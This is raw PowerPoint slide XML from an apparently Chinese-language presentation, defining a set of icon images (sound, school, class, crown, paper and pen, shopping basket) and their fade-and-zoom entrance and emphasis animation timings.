      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="23" name="图片 22" descr="声音"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId30">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId31"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="2476500"/>
            <a:ext cx="467360" cy="467360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="24" name="图片 23" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId32">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId33"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2743200" y="2324100"/>
            <a:ext cx="574040" cy="574040"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="25" name="图片 24" descr="上学"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId34">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId35"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3604260" y="2545080"/>
            <a:ext cx="527685" cy="527685"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="图片 25" descr="上课"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId36">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId37"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4054475" y="1998980"/>
            <a:ext cx="476885" cy="476885"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="27" name="图片 26" descr="皇冠"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId38">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId39"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1047750" y="3238500"/>
            <a:ext cx="523875" cy="523875"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="28" name="图片 27" descr="纸笔"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId40">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId41"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="1040130"/>
            <a:ext cx="568325" cy="568325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="29" name="图片 28" descr="购物篮"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId42">
            <a:extLst>
              <a:ext uri="{96DAC541-7B7A-43D3-8B79-37D633B846F1}">
                <asvg:svgBlip xmlns:asvg="http://schemas.microsoft.com/office/drawing/2016/SVG/main" r:embed="rId43"/>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3317240" y="1901190"/>
            <a:ext cx="574675" cy="574675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>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1" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="18" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2049"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="19" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="21" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="22" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2549"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="23" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="24" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="29" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="30" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="31" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="32" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="33" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="21"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="34" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="3799"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="35" presetID="16" presetClass="entr" presetSubtype="21" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="36" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="barn(inVertical)">
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="20"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="38" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="4299"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="39" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="40" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="41" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="42" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="45" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="46" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5050"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="47" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="49" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="10"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105000"/>
                                    </p:animScale>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="50" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="5550"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="51" presetID="41" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="10000"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="52" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="53" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_x+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="54" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="55" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_h</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_h/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_h+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_h"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_w</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_w/10"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="50000">
                                          <p:val>
                                            <p:strVal val="#ppt_w+.01"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_w"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="57" dur="500" tmFilter="0,0; .5, 1; 1, 1"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="58" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="7600"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="59" presetID="26" presetClass="emph" presetSubtype="0" fill="hold" grpId="1" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:iterate type="lt">
                                    <p:tmPct val="0"/>
                                  </p:iterate>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500" tmFilter="0, 0; .2, .5; .8, .5; 1, 0"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:animScale>
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="250" autoRev="1" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="11"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                      <p:by x="105000" y="105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21" grpId="1"/>
      <p:bldP spid="3" grpId="0"/>
      <p:bldP spid="3" grpId="1"/>
